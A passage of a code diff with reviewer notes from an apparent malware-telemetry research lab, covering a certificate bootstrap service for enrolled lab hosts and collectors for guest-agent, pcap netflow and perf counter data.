+    p.add_argument("--listen-host", default="127.0.0.1")
+    p.add_argument("--listen-port", type=int, default=8446)
+    p.add_argument(
+        "--issuer-script",
+        type=Path,
+        default=Path("/home/max/.env/wg-pki/scripts/issue-cis490-client-cert.sh"),
+        help="Path to the wg-pki leaf-cert mint script.",
+    )
+    p.add_argument(
+        "--issued-root",
+        type=Path,
+        default=Path("/home/max/.env/wg-pki/issued"),
+        help="Where minted tarballs are cached.",
+    )
+    p.add_argument("--log-level", default="info")
+    args = p.parse_args(argv)
+
+    logging.basicConfig(
+        level=getattr(logging, args.log_level.upper(), logging.INFO),
+        format="%(asctime)s %(levelname)s %(name)s %(message)s",
+    )
+    log = logging.getLogger("cis490.bootstrap.main")
+
+    if not args.issuer_script.exists():
+        log.error("issuer script missing: %s", args.issuer_script)
+        return 2
+
+    app = make_app(
+        issuer_script=args.issuer_script,
+        issued_root=args.issued_root,
+    )
+    log.info("listening on %s:%d", args.listen_host, args.listen_port)
+    uvicorn.run(
+        app,
+        host=args.listen_host,
+        port=args.listen_port,
+        log_level=args.log_level.lower(),
+        access_log=True,
+    )
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())
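Reviewer sketch (not part of the commit): a lab host calling this service needs the URL for the `GET /v1/cert/{host_id}` endpoint documented in `bootstrap/app.py`. The helper below is a minimal client-side illustration. The character class mirrors `_HOST_ID_RE` from that file, and `bootstrap.wg` is the Caddy site named in the launcher docstring. The `https://` scheme, the function name, and the extra rejection of `.` and `..` are assumptions made for the example.

```python
import re
from urllib.parse import quote

# Same character class and length limit as _HOST_ID_RE in bootstrap/app.py.
HOST_ID_RE = re.compile(r"[A-Za-z0-9_.-]{1,64}")


def cert_url(host_id: str, base: str = "https://bootstrap.wg") -> str:
    """Return the cert-pull URL for host_id, or raise ValueError.

    fullmatch() rejects trailing newlines that match() with `$` would
    accept. "." and ".." are refused explicitly because they satisfy the
    character class but are path components, not names.
    """
    if host_id in {".", ".."} or not HOST_ID_RE.fullmatch(host_id):
        raise ValueError(f"invalid host_id: {host_id!r}")
    return f"{base}/v1/cert/{quote(host_id, safe='')}"


if __name__ == "__main__":
    print(cert_url("lab-host-01"))
```

Validating on the client as well as the server means a typo in `lab-host.toml` fails locally with a clear error before any request is sent.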
--- a/bootstrap/app.py
+++ b/bootstrap/app.py
@@ -0,0 +1,146 @@
+"""``cis490-bootstrap`` — auto-issue mTLS leaf certs to enrolled lab hosts.
+
+This is the chicken-and-egg fix for first-time lab-host setup. A
+freshly wg-enrolled device has WG access (and trusts the wg-pki CA)
+but has no client cert yet, so it can't authenticate to the
+mTLS-protected ``collector.wg``. This service exposes a *plain-TLS*
+(no client-auth) endpoint that the lab host can call once during
+``install-lab-host.sh`` to retrieve its leaf cert tarball.
+
+Trust boundary: anything that reaches ``bootstrap.wg`` has already
+passed iptmonads' WG-membership check at L4. No further
+authentication is required for the bootstrap pull — by the time a
+caller can connect at all they're a peer the operator authorized.
+
+The privilege boundary, on the other hand, is real: minting certs
+requires the wg-pki CA private key (root-only at
+``/var/lib/wg-pki/cis490-client-ca/ca.key``). This service therefore
+runs as root in a tight sandbox (see ``etc/cis490-bootstrap.service``)
+and shells out to ``issue-cis490-client-cert.sh`` for each mint.
+
+Endpoints:
+
+  GET /v1/cert/{host_id}   — return tarball of {ca.crt, leaf.pem, leaf.key}
+                             for ``host_id``. Cached — successive calls
+                             return the same bytes.
+  GET /v1/health           — liveness probe (no auth needed).
+
+Each mint is logged with the source IP (after Caddy's X-Real-IP
+forward) so the operator has an audit trail of which devices have
+fetched which certs.
+"""
+
+from __future__ import annotations
+
+import logging
+import re
+import subprocess
+import time
+from pathlib import Path
+from typing import Awaitable, Callable
+
+from starlette.applications import Starlette
+from starlette.requests import Request
+from starlette.responses import FileResponse, JSONResponse, Response
+from starlette.routing import Route
+
+
+log = logging.getLogger("cis490.bootstrap")
+
+
+# Sane host_id charset — same rules the receiver enforces, mirrored
+# here so mint requests can't smuggle path traversal in.
+_HOST_ID_RE = re.compile(r"^[A-Za-z0-9_.-]{1,64}$")
+
+
+def _is_valid_host_id(s: str) -> bool:
+    return bool(_HOST_ID_RE.match(s))
+
+
+def make_app(
+    *,
+    issuer_script: Path,
+    issued_root: Path,
+    rate_limit_window_s: float = 5.0,
+) -> Starlette:
+    """Build the Starlette app. Wired by the production launcher in
+    ``bootstrap/__main__.py``; tests can pass synthetic paths."""
+    issued_root.mkdir(parents=True, exist_ok=True)
+
+    # Coarse per-IP rate limiter to make a casual scan annoying. Not
+    # a real defense — the WG mesh is the actual perimeter.
+    last_request: dict[str, float] = {}
+
+    async def health(request: Request) -> Response:
+        return JSONResponse({"status": "ok"})
+
+    async def get_cert(request: Request) -> Response:
+        host_id: str = request.path_params["host_id"]
+        if not _is_valid_host_id(host_id):
+            return JSONResponse({"error": "bad host_id"}, status_code=400)
+
+        # Caddy forwards the original WG-side IP via X-Real-IP /
+        # X-Forwarded-For; fall back to the direct peer if running
+        # without Caddy in front (tests).
+        src = (
+            request.headers.get("x-real-ip")
+            or (request.headers.get("x-forwarded-for") or "").split(",")[0].strip()
+            or (request.client.host if request.client else "?")
+        )
+
+        now = time.monotonic()
+        prev = last_request.get(src)
+        if prev is not None and (now - prev) < rate_limit_window_s:
+            return JSONResponse(
+                {"error": "rate limited; back off"},
+                status_code=429,
+            )
+        last_request[src] = now
+
+        tar_path = issued_root / host_id / f"{host_id}.tar"
+        if not tar_path.exists():
+            log.info("minting cert for host_id=%s src=%s", host_id, src)
+            try:
+                subprocess.run(
+                    [
+                        str(issuer_script), host_id,
+                        "--out-dir", str(issued_root / host_id),
+                    ],
+                    check=True,
+                    capture_output=True,
+                    text=True,
+                    timeout=30,
+                )
+            except subprocess.CalledProcessError as e:
+                log.error("issue script failed for %s: rc=%d stderr=%s",
+                          host_id, e.returncode, e.stderr[:500])
+                return JSONResponse(
+                    {"error": "mint failed", "detail": e.stderr[:500]},
+                    status_code=500,
+                )
+            except (OSError, subprocess.TimeoutExpired) as e:
+                log.exception("issue script transport error for %s", host_id)
+                return JSONResponse(
+                    {"error": f"transport: {e}"},
+                    status_code=500,
+                )
+        else:
+            log.info("cache hit for host_id=%s src=%s", host_id, src)
+
+        if not tar_path.exists():
+            return JSONResponse({"error": "tarball not produced"}, status_code=500)
+        return FileResponse(
+            tar_path,
+            media_type="application/x-tar",
+            filename=f"{host_id}.tar",
+            headers={
+                "X-Cis490-Host-Id": host_id,
+                "X-Cis490-Cert-Source-IP": src,
+            },
+        )
+
+    routes = [
+        Route("/v1/health", health, methods=["GET"]),
+        Route("/v1/cert/{host_id}", get_cert, methods=["GET"]),
+    ]
+    return Starlette(routes=routes)
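
The coarse per-IP limiter inside `get_cert` can be looked at in isolation. The following is a minimal sketch, not code from this repo: the class name `PerKeyRateLimiter` and the injectable `clock` parameter are assumptions introduced here so the behaviour can be exercised without sleeping. As in the handler above, a rejected request does not refresh the stored timestamp.

```python
import time
from typing import Callable, Dict, Optional


class PerKeyRateLimiter:
    """Allow at most one request per key every ``window_s`` seconds.

    Hypothetical helper mirroring the ``last_request`` dict in
    ``make_app``; ``clock`` is injectable purely for testing.
    """

    def __init__(
        self,
        window_s: float,
        clock: Callable[[], float] = time.monotonic,
    ) -> None:
        self.window_s = window_s
        self._clock = clock
        self._last: Dict[str, float] = {}

    def allow(self, key: str) -> bool:
        now = self._clock()
        prev: Optional[float] = self._last.get(key)
        # A key that was never seen is always allowed; using None as
        # the sentinel avoids comparing against an arbitrary 0.0.
        if prev is not None and (now - prev) < self.window_s:
            return False
        self._last[key] = now
        return True
```

With a fake clock, two back-to-back calls for the same key give `True` then `False`, and the key is admitted again once the window has elapsed. Note that the dict grows with the number of distinct keys; the sketch, like the handler, does not evict old entries.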
--- a/collectors/guest_agent.py
+++ b/collectors/guest_agent.py
@ -0,0 +1,119 @@
+"""Source 5 (feature, deployable): in-guest agent reader.
+
+QEMU exposes a virtio-serial channel two ways:
+  - inside the guest: ``/dev/virtio-ports/cis490.guest.agent``
+  - on the host:      a unix socket at ``$RUN_DIR/agent.sock``
+
+The in-guest agent (`vm/guest-agent/cis490_agent.py`) writes one
+JSON-lines row per tick into the guest-side device. Bytes traverse the
+virtio bus and surface on the host socket. This collector reads them,
+re-stamps with the host's monotonic clock (so rows align with all
+other telemetry on a single timeline), and persists to
+``telemetry-guest.jsonl``.
+
+Why re-stamp? The agent's clock is the *guest* clock, which can drift
+from the host (rare in KVM, but happens during live-migration tests
+and on heavy host load). The original guest timestamps stay in the row
+under ``t_guest_*`` so analysts can quantify drift if they care.
+
+This source is the **deployable** side: every row is tagged
+``available_in_deployment: true``. See docs/threat-model.md.
+"""
+
+from __future__ import annotations
+
+import json
+import logging
+import socket
+import threading
+import time
+from pathlib import Path
+
+
+log = logging.getLogger("cis490.collectors.guest_agent")
+
+SOURCE = "guest_agent"
+AVAILABLE_IN_DEPLOYMENT = True
+
+
+def _connect(socket_path: Path, timeout_s: float) -> socket.socket | None:
+    deadline = time.monotonic() + timeout_s
+    last_err: OSError | None = None
+    while time.monotonic() < deadline:
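+        s: socket.socket | None = None
+        try:
+            s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
+            s.settimeout(2.0)
+            s.connect(str(socket_path))
+            return s
+        except OSError as e:
+            if s is not None:
+                s.close()  # don't leak a descriptor per failed attempt
+            last_err = e
+            time.sleep(0.5)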
+    if last_err is not None:
+        log.warning("guest-agent socket %s never came up: %s", socket_path, last_err)
+    return None
+
+
+def _stamp(row: dict, t_mono_origin_ns: int) -> dict:
+    """Re-stamp a row with host-clock timestamps, keeping the guest's
+    originals under ``t_guest_*`` for drift analysis."""
+    out = dict(row)
+    # Preserve what the agent sent: explicit ``t_guest_*`` fields win;
+    # otherwise copy any plain ``t_mono_ns`` / ``t_wall_ns`` before
+    # they are overwritten with host-clock values below.
+    out.setdefault("t_guest_mono_ns", row.get("t_mono_ns"))
+    out.setdefault("t_guest_wall_ns", row.get("t_wall_ns"))
+    out["t_mono_ns"] = time.monotonic_ns() - t_mono_origin_ns
+    out["t_wall_ns"] = time.time_ns()
+    out.setdefault("source", SOURCE)
+    out.setdefault("available_in_deployment", AVAILABLE_IN_DEPLOYMENT)
+    return out
+
+
+def run_loop(
+    socket_path: str | Path,
+    output_path: Path,
+    t_mono_origin_ns: int,
+    stop_event: threading.Event,
+    *,
+    connect_timeout_s: float = 30.0,
+) -> int:
+    """Read agent JSON-lines from the host-side virtio-serial unix
+    socket. Re-stamp each row with the host clock and persist."""
+    sock_path = Path(socket_path)
+    sock = _connect(sock_path, connect_timeout_s)
+    if sock is None:
+        return 0
+
+    rows = 0
+    output_path.parent.mkdir(parents=True, exist_ok=True)
+    buf = b""
+    try:
+        with output_path.open("a", buffering=1) as f:
+            while not stop_event.is_set():
+                try:
+                    sock.settimeout(0.5)
+                    chunk = sock.recv(8192)
+                except socket.timeout:
+                    continue
+                except OSError as e:
+                    log.warning("guest-agent recv failed: %s", e)
+                    break
+                if not chunk:
+                    log.info("guest-agent socket closed")
+                    break
+                buf += chunk
+                while b"\n" in buf:
+                    line, _, buf = buf.partition(b"\n")
+                    line = line.strip()
+                    if not line:
+                        continue
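+                    try:
+                        row = json.loads(line)
+                    except ValueError as e:  # JSONDecodeError or invalid UTF-8
+                        log.warning("dropping malformed guest-agent line: %s", e)
+                        continue
+                    if not isinstance(row, dict):
+                        log.warning("dropping non-object guest-agent line")
+                        continue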
+                    f.write(json.dumps(_stamp(row, t_mono_origin_ns)) + "\n")
+                    rows += 1
+    finally:
+        try:
+            sock.close()
+        except OSError:
+            pass
+    return rows
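
The framing logic in `run_loop` (accumulate bytes, split on newlines, keep the unterminated tail for the next `recv`) can be sketched as a pure function. This is an illustrative sketch only; the function name `feed` is an assumption and does not exist in the repo. It also drops lines that are valid JSON but not objects, since the collector re-stamps rows as dicts.

```python
import json
from typing import Dict, List, Tuple


def feed(buf: bytes, chunk: bytes) -> Tuple[List[Dict], bytes]:
    """Append ``chunk`` to ``buf``; return (complete rows, leftover bytes).

    Hypothetical helper: the leftover is whatever follows the last
    newline and must be passed back in on the next call.
    """
    buf += chunk
    rows: List[Dict] = []
    while b"\n" in buf:
        line, _, buf = buf.partition(b"\n")
        line = line.strip()
        if not line:
            continue
        try:
            row = json.loads(line)
        except ValueError:
            # Covers json.JSONDecodeError and undecodable bytes.
            continue
        if isinstance(row, dict):
            rows.append(row)
    return rows, buf
```

A row split across two chunks is only emitted once its terminating newline arrives, which is why the collector keeps `buf` alive across loop iterations.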
--- a/collectors/pcap.py
+++ b/collectors/pcap.py
@ -0,0 +1,288 @@
+"""Source 4 (feature, deployable): bridge-side pcap + bucketed netflow.
+
+Captures packets on the host-only ``br-malware`` bridge during an
+episode, writes the raw pcap, and produces a bucketed JSONL file the
+trainer can consume directly.
+
+The capture is **gateway-side** — the orchestrator sees the same
+packets a real upstream router/gateway would see in deployment, so
+features derived here transfer 1:1 to the deployment-time gateway
+observer.
+
+Implementation:
+
+  - ``run_capture()`` spawns ``tcpdump -i <bridge> -U -w <out.pcap>``
+    as a subprocess for the episode duration. ``-U`` flushes per
+    packet so the file is consumable mid-flight.
+
+  - ``bucketize()`` reads a finished pcap and emits 100 ms-bucketed
+    rows into ``netflow.jsonl``. Pure-Python pcap parser (no scapy /
+    dpkt dependency); decodes Ethernet + IPv4 + TCP/UDP enough to fill
+    the schema in docs/data-model.md.
+
+The pure-Python parser is intentionally minimal — it does NOT do
+fragment reassembly, IPv6, VLAN tags, or anything fancy. It handles
+the cases that occur on a host-only bridge for malware behaviour:
+plain Ethernet II, IPv4, TCP/UDP. Other frames are still counted at
+the byte/packet level but skipped for protocol-specific stats.
+"""
+
+from __future__ import annotations
+
+import json
+import logging
+import os
+import struct
+import subprocess
+import threading
+import time
+from collections import defaultdict
+from dataclasses import dataclass
+from pathlib import Path
+
+
+log = logging.getLogger("cis490.collectors.pcap")
+
+SOURCE = "bridge_pcap"
+AVAILABLE_IN_DEPLOYMENT = True
+
+# Pcap file-level header
+_PCAP_GLOBAL_HDR = "<IHHiIII"
+_PCAP_GLOBAL_HDR_SIZE = 24
+_PCAP_REC_HDR = "<IIII"
+_PCAP_REC_HDR_SIZE = 16
+_PCAP_MAGIC_USEC = 0xa1b2c3d4
+_PCAP_MAGIC_NSEC = 0xa1b23c4d  # nanosecond resolution variant
+
+
+# ---------------------------------------------------------------------------
+# Capture
+# ---------------------------------------------------------------------------
+
+
+@dataclass
+class CaptureHandle:
+    proc: subprocess.Popen
+    pcap_path: Path
+    bridge: str
+    started_mono_ns: int
+
+
+def run_capture(
+    *,
+    bridge: str,
+    pcap_path: Path,
+    snaplen: int = 256,
+    bpf: str | None = None,
+) -> CaptureHandle:
+    """Start a tcpdump capture on ``bridge``. Returns a handle the
+    caller stops via ``stop_capture()``."""
+    pcap_path.parent.mkdir(parents=True, exist_ok=True)
+    args = ["tcpdump", "-i", bridge, "-U", "-s", str(snaplen), "-w", str(pcap_path)]
+    if bpf:
+        args.append(bpf)
+    log.info("starting pcap: %s", " ".join(args))
+    proc = subprocess.Popen(
+        args,
+        stdout=subprocess.DEVNULL,
+        stderr=subprocess.PIPE,
+        # tcpdump may need root or CAP_NET_RAW. We don't elevate here.
+    )
+    return CaptureHandle(
+        proc=proc, pcap_path=pcap_path, bridge=bridge,
+        started_mono_ns=time.monotonic_ns(),
+    )
+
+
+def stop_capture(handle: CaptureHandle, *, timeout_s: float = 5.0) -> int:
+    """SIGINT tcpdump (the Right Signal — flushes buffers + exits 0).
+    Returns the process exit code."""
+    proc = handle.proc
+    if proc.poll() is None:
+        proc.send_signal(2)  # SIGINT
+        try:
+            proc.wait(timeout=timeout_s)
+        except subprocess.TimeoutExpired:
+            proc.kill()
+            proc.wait(timeout=timeout_s)
+    return proc.returncode
+
+
+# ---------------------------------------------------------------------------
+# Pure-Python pcap parser
+# ---------------------------------------------------------------------------
+
+
+def _iter_pcap(path: Path):
+    """Yield ``(t_pkt_ns, frame_bytes)`` for every record in a pcap
+    file. Tolerates either microsecond or nanosecond magics."""
+    with path.open("rb") as f:
+        hdr = f.read(_PCAP_GLOBAL_HDR_SIZE)
+        if len(hdr) < _PCAP_GLOBAL_HDR_SIZE:
+            return
+        magic = struct.unpack("<I", hdr[:4])[0]
+        if magic == _PCAP_MAGIC_USEC:
+            sub_mult = 1000  # us → ns
+        elif magic == _PCAP_MAGIC_NSEC:
+            sub_mult = 1
+        else:
+            log.warning("unknown pcap magic %#x in %s", magic, path)
+            return
+        while True:
+            rec = f.read(_PCAP_REC_HDR_SIZE)
+            if len(rec) < _PCAP_REC_HDR_SIZE:
+                return
+            ts_sec, ts_sub, caplen, _ = struct.unpack(_PCAP_REC_HDR, rec)
+            data = f.read(caplen)
+            if len(data) < caplen:
+                return
+            t_ns = ts_sec * 1_000_000_000 + ts_sub * sub_mult
+            yield t_ns, data
+
+
+def _decode(frame: bytes) -> dict:
+    """Decode an Ethernet/IPv4/{TCP,UDP} frame to a flat dict. Unknown
+    protocols return only the ethertype + lengths."""
+    out: dict = {"size": len(frame)}
+    if len(frame) < 14:
+        return out
+    ethertype = struct.unpack(">H", frame[12:14])[0]
+    out["ethertype"] = ethertype
+    if ethertype != 0x0800:  # not IPv4 — count, don't decode further
+        return out
+    ip = frame[14:]
+    if len(ip) < 20:
+        return out
+    ihl = (ip[0] & 0x0F) * 4
+    if ihl < 20 or len(ip) < ihl:
+        return out
+    proto = ip[9]
+    src = ip[12:16]
+    dst = ip[16:20]
+    out["ip_proto"] = proto
+    out["src_ip"] = ".".join(str(b) for b in src)
+    out["dst_ip"] = ".".join(str(b) for b in dst)
+    payload = ip[ihl:]
+    if proto == 6 and len(payload) >= 20:  # TCP
+        sport, dport, _, _, off_flags = struct.unpack(">HHIIH", payload[:14])
+        flags = off_flags & 0x003F
+        out["src_port"] = sport
+        out["dst_port"] = dport
+        out["tcp_flags"] = flags  # FIN=1 SYN=2 RST=4 PSH=8 ACK=16 URG=32
+    elif proto == 17 and len(payload) >= 8:  # UDP
+        sport, dport, _, _ = struct.unpack(">HHHH", payload[:8])
+        out["src_port"] = sport
+        out["dst_port"] = dport
+    return out
+
+
+def bucketize(
+    pcap_path: Path,
+    netflow_path: Path,
+    *,
+    bucket_ms: int = 100,
+    t_mono_origin_ns: int = 0,
+    bridge_ip: str = "10.200.0.1",
+) -> int:
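+    """Read a pcap and emit one row per ``bucket_ms`` window into
+    ``netflow.jsonl``. The ``in/out`` direction is from the bridge
+    perspective (host = ``bridge_ip``):
+
+      out = packet whose src is the host-side address (host → guest)
+      in  = anything else seen on the bridge (guest → host,
+            guest-to-guest, or non-IPv4 frames such as ARP)
+
+    Pcap timestamps are wall-clock (epoch) nanoseconds, so
+    ``t_mono_origin_ns`` only yields a meaningful ``t_mono_ns`` when
+    it is expressed on that same scale; a raw ``time.monotonic_ns()``
+    reading is on a different clock.
+
+    Returns the number of rows written."""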
+    if not pcap_path.exists():
+        return 0
+    bucket_ns = bucket_ms * 1_000_000
+    netflow_path.parent.mkdir(parents=True, exist_ok=True)
+
+    rows = 0
+    bucket_start: int | None = None
+    agg: dict = _empty_bucket()
+    with netflow_path.open("a", buffering=1) as out:
+        for t_pkt_ns, frame in _iter_pcap(pcap_path):
+            d = _decode(frame)
+            # Establish first bucket origin on first packet.
+            if bucket_start is None:
+                bucket_start = t_pkt_ns - (t_pkt_ns % bucket_ns)
+            while t_pkt_ns >= bucket_start + bucket_ns:
+                _flush(out, agg, bucket_start, bucket_ns, t_mono_origin_ns)
+                rows += 1
+                agg = _empty_bucket()
+                bucket_start += bucket_ns
+            _accumulate(agg, d, bridge_ip)
+        if bucket_start is not None and any(agg.values()):
+            _flush(out, agg, bucket_start, bucket_ns, t_mono_origin_ns)
+            rows += 1
+    return rows
+
+
+def _empty_bucket() -> dict:
+    return {
+        "pkts_in": 0, "pkts_out": 0,
+        "bytes_in": 0, "bytes_out": 0,
+        "syn_count": 0, "fin_count": 0, "rst_count": 0,
+        "udp_count": 0, "tcp_count": 0,
+        "dns_query_count": 0,
+        "dst_ips": set(), "dst_ports": set(),
+        "tcp_new_flows": 0,
+    }
+
+
+def _accumulate(agg: dict, d: dict, bridge_ip: str) -> None:
+    sz = d.get("size", 0)
+    is_out = d.get("src_ip") == bridge_ip
+    if is_out:
+        agg["pkts_out"] += 1
+        agg["bytes_out"] += sz
+    else:
+        agg["pkts_in"] += 1
+        agg["bytes_in"] += sz
+
+    proto = d.get("ip_proto")
+    if proto == 6:
+        agg["tcp_count"] += 1
+        flags = d.get("tcp_flags", 0)
+        if flags & 0x02:  # SYN
+            agg["syn_count"] += 1
+            if not (flags & 0x10):  # SYN without ACK = new flow
+                agg["tcp_new_flows"] += 1
+        if flags & 0x01:
+            agg["fin_count"] += 1
+        if flags & 0x04:
+            agg["rst_count"] += 1
+    elif proto == 17:
+        agg["udp_count"] += 1
+        if d.get("dst_port") == 53:
+            agg["dns_query_count"] += 1
+
+    dst = d.get("dst_ip")
+    if dst:
+        agg["dst_ips"].add(dst)
+    dport = d.get("dst_port")
+    if dport is not None:
+        agg["dst_ports"].add(dport)
+
+
+def _flush(out, agg: dict, bucket_start_ns: int, bucket_ns: int, t_mono_origin_ns: int) -> None:
+    row = {
+        "t_mono_ns": bucket_start_ns - t_mono_origin_ns,
+        "t_wall_ns": bucket_start_ns,
+        "source": SOURCE,
+        "available_in_deployment": AVAILABLE_IN_DEPLOYMENT,
+        "bucket_ms": bucket_ns // 1_000_000,
+        "pkts_in": agg["pkts_in"], "pkts_out": agg["pkts_out"],
+        "bytes_in": agg["bytes_in"], "bytes_out": agg["bytes_out"],
+        "syn_count": agg["syn_count"],
+        "fin_count": agg["fin_count"],
+        "rst_count": agg["rst_count"],
+        "udp_count": agg["udp_count"],
+        "tcp_count": agg["tcp_count"],
+        "dns_query_count": agg["dns_query_count"],
+        "unique_dst_ips": len(agg["dst_ips"]),
+        "unique_dst_ports": len(agg["dst_ports"]),
+        "tcp_new_flows": agg["tcp_new_flows"],
+    }
+    out.write(json.dumps(row) + "\n")
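
The byte offsets that `_decode` relies on, and the bucket alignment used by `bucketize`, can be checked against a hand-built frame. The sketch below is self-contained and does not import the collector; the helper names `build_tcp_frame`, `tcp_ports_and_flags`, and `bucket_start_ns` are assumptions made for illustration. Checksums are left at zero because nothing here validates them.

```python
import struct
from typing import Optional, Tuple

ETHERTYPE_IPV4 = 0x0800
IPPROTO_TCP = 6


def build_tcp_frame(src_ip: bytes, dst_ip: bytes,
                    sport: int, dport: int, flags: int) -> bytes:
    """Build a minimal Ethernet II + IPv4 + TCP frame (no payload)."""
    eth = b"\x00" * 12 + struct.pack(">H", ETHERTYPE_IPV4)
    # version/IHL=0x45, tos, total_len=40, id, frag, ttl, proto, csum, src, dst
    ip = struct.pack(">BBHHHBBH4s4s", 0x45, 0, 40, 0, 0, 64,
                     IPPROTO_TCP, 0, src_ip, dst_ip)
    # sport, dport, seq, ack, data-offset(5 words)+flags, window, csum, urg
    tcp = struct.pack(">HHIIHHHH", sport, dport, 0, 0,
                      (5 << 12) | flags, 65535, 0, 0)
    return eth + ip + tcp


def tcp_ports_and_flags(frame: bytes) -> Optional[Tuple[int, int, int]]:
    """Return (src_port, dst_port, flags) for an IPv4/TCP frame, else None."""
    if len(frame) < 14 + 20:
        return None
    if struct.unpack(">H", frame[12:14])[0] != ETHERTYPE_IPV4:
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4  # header length in bytes
    if ihl < 20 or ip[9] != IPPROTO_TCP or len(ip) < ihl + 14:
        return None
    sport, dport, _seq, _ack, off_flags = struct.unpack(
        ">HHIIH", ip[ihl:ihl + 14])
    return sport, dport, off_flags & 0x3F  # FIN=1 SYN=2 RST=4 PSH=8 ACK=16 URG=32


def bucket_start_ns(t_pkt_ns: int, bucket_ms: int = 100) -> int:
    """Floor a packet timestamp to the start of its bucket."""
    bucket_ns = bucket_ms * 1_000_000
    return t_pkt_ns - (t_pkt_ns % bucket_ns)
```

A SYN-only frame built this way decodes to flags `0x02`, which is the case `_accumulate` counts as a new TCP flow.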
--- a/collectors/perf_qemu.py
+++ b/collectors/perf_qemu.py
@ -0,0 +1,201 @@
+"""Source 3 (oracle): ``perf stat -p <qemu_pid>`` sampler.
+
+Spawns ``perf stat`` in interval-JSON mode against the qemu pid and
+aggregates the per-event counter values into per-interval telemetry
+rows. Unlike the /proc and QMP collectors, perf needs CAP_SYS_ADMIN
+or ``kernel.perf_event_paranoid <= 1`` to read counters for a process
+the collector doesn't own — typically true on a lab host running
+QEMU under the cis490 service user.
+
+Source 3 is **oracle-only** — perf counters are not available on a
+deployed device. Every row carries ``available_in_deployment: false``.
+
+The events we ask for are the small canonical set named in
+docs/data-model.md:
+
+    cycles, instructions, cache-references, cache-misses,
+    branches, branch-misses, page-faults, context-switches
+
+Anything perf can't enable on the host (e.g. cache-misses without
+hardware support) is silently dropped from the row.
+"""
+
+from __future__ import annotations
+
+import json
+import logging
+import shutil
+import subprocess
+import threading
+import time
+from pathlib import Path
+
+
+log = logging.getLogger("cis490.collectors.perf_qemu")
+
+SOURCE = "host_perf"
+AVAILABLE_IN_DEPLOYMENT = False
+
+DEFAULT_EVENTS = (
+    "cycles",
+    "instructions",
+    "cache-references",
+    "cache-misses",
+    "branches",
+    "branch-misses",
+    "page-faults",
+    "context-switches",
+)
+
+
+def perf_available() -> bool:
+    return shutil.which("perf") is not None
+
+
+def _coerce_int(s: str | int | None) -> int | None:
+    if s is None:
+        return None
+    if isinstance(s, int):
+        return s
+    s = s.strip()
+    if not s or s in ("<not counted>", "<not supported>"):
+        return None
+    # perf prints comma-separated thousands by default; we asked -j so
+    # we usually get plain numbers, but guard for both shapes.
+    s = s.replace(",", "")
+    try:
+        return int(s)
+    except ValueError:
+        try:
+            return int(float(s))
+        except ValueError:
+            return None
+
+
+def _build_row(t_mono_origin_ns: int, interval_s: float, agg: dict[str, int]) -> dict:
+    cycles = agg.get("cycles")
+    insns = agg.get("instructions")
+    cache_refs = agg.get("cache-references")
+    cache_miss = agg.get("cache-misses")
+    ipc = (insns / cycles) if (cycles and insns is not None) else None
+    miss_rate = (cache_miss / cache_refs) if (cache_refs and cache_miss is not None) else None
+
+    return {
+        "t_mono_ns": time.monotonic_ns() - t_mono_origin_ns,
+        "t_wall_ns": time.time_ns(),
+        "source": SOURCE,
+        "available_in_deployment": AVAILABLE_IN_DEPLOYMENT,
+        "interval_s": interval_s,
+        "cycles": cycles,
+        "instructions": insns,
+        "cache_references": cache_refs,
+        "cache_misses": cache_miss,
+        "branches": agg.get("branches"),
+        "branch_misses": agg.get("branch-misses"),
+        "page_faults": agg.get("page-faults"),
+        "context_switches": agg.get("context-switches"),
+        "ipc": ipc,
+        "cache_miss_rate": miss_rate,
+    }
+
+
+def parse_perf_event_line(line: str) -> dict | None:
+    """Parse one ``perf stat -j`` event line. Returns None for blank
+    lines, for non-JSON status messages that perf occasionally
+    interleaves with its output, and for lines that fail to parse."""
+    line = line.strip()
+    if not line.startswith("{"):
+        return None
+    try:
+        return json.loads(line)
+    except json.JSONDecodeError:
+        return None
+
+
+def run_loop(
+    pid: int,
+    output_path: Path,
+    t_mono_origin_ns: int,
+    interval_ms: int,
+    stop_event: threading.Event,
+    *,
+    events: tuple[str, ...] = DEFAULT_EVENTS,
+) -> int:
+    """Spawn perf stat -j against ``pid`` and stream rows until stop.
+    Returns the number of rows written."""
+    if not perf_available():
+        log.warning("perf binary not on PATH — perf collector disabled")
+        return 0
+
+    cmd = [
+        "perf", "stat",
+        "-p", str(pid),
+        "-I", str(interval_ms),
+        "-j",
+        "-e", ",".join(events),
+    ]
+    log.info("starting perf: %s", " ".join(cmd))
+
+    try:
+        proc = subprocess.Popen(
+            cmd,
+            stdout=subprocess.PIPE,
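+            # perf stat normally writes its report to stderr; merge it
+            # into stdout so one pipe carries the JSON lines and an
+            # undrained stderr pipe can't stall perf. Non-JSON lines
+            # are filtered by parse_perf_event_line().
+            stderr=subprocess.STDOUT,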
+            bufsize=1,
+            text=True,
+        )
+    except (FileNotFoundError, PermissionError) as e:
+        log.warning("perf launch failed: %s", e)
+        return 0
+
+    rows = 0
+    output_path.parent.mkdir(parents=True, exist_ok=True)
+    cur_interval: float | None = None
+    agg: dict[str, int] = {}
+
+    def _flush() -> None:
+        nonlocal rows
+        if cur_interval is None or not agg:
+            return
+        row = _build_row(t_mono_origin_ns, cur_interval, agg)
+        out_f.write(json.dumps(row) + "\n")
+        rows += 1
+
+    try:
+        with output_path.open("a", buffering=1) as out_f:
+            # perf interleaves events and writes to stdout in -j mode.
+            # We read line by line until the process exits (which
+            # happens when we kill it on stop, or when the target pid
+            # disappears and perf's internal -p polling notices).
+            assert proc.stdout is not None
+            for line in proc.stdout:
+                if stop_event.is_set():
+                    break
+                evt = parse_perf_event_line(line)
+                if evt is None:
+                    continue
+                interval = evt.get("interval")
+                event_name = evt.get("event")
+                value = _coerce_int(evt.get("counter-value"))
+                if interval is None or event_name is None:
+                    continue
+                # perf emits one JSON per (event, interval); a new
+                # interval value means we should flush the previous row.
+                if cur_interval is not None and interval != cur_interval:
+                    _flush()
+                    agg = {}
+                cur_interval = interval
+                if value is not None:
+                    agg[event_name] = value
+            # End of stream — flush the last partial row.
+            _flush()
+    finally:
+        if proc.poll() is None:
+            proc.terminate()
+            try:
+                proc.wait(timeout=3.0)
+            except subprocess.TimeoutExpired:
+                proc.kill()
+                proc.wait(timeout=2.0)
+
+    return rows
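
The aggregation in `run_loop` (one JSON object per event, flushed as a row whenever the `interval` value changes) can be sketched as a generator over text lines. This is a hedged sketch, not the collector itself: the function name `group_by_interval` is an assumption, and the only input keys it relies on are the ones the collector already reads (`interval`, `event`, `counter-value`).

```python
import json
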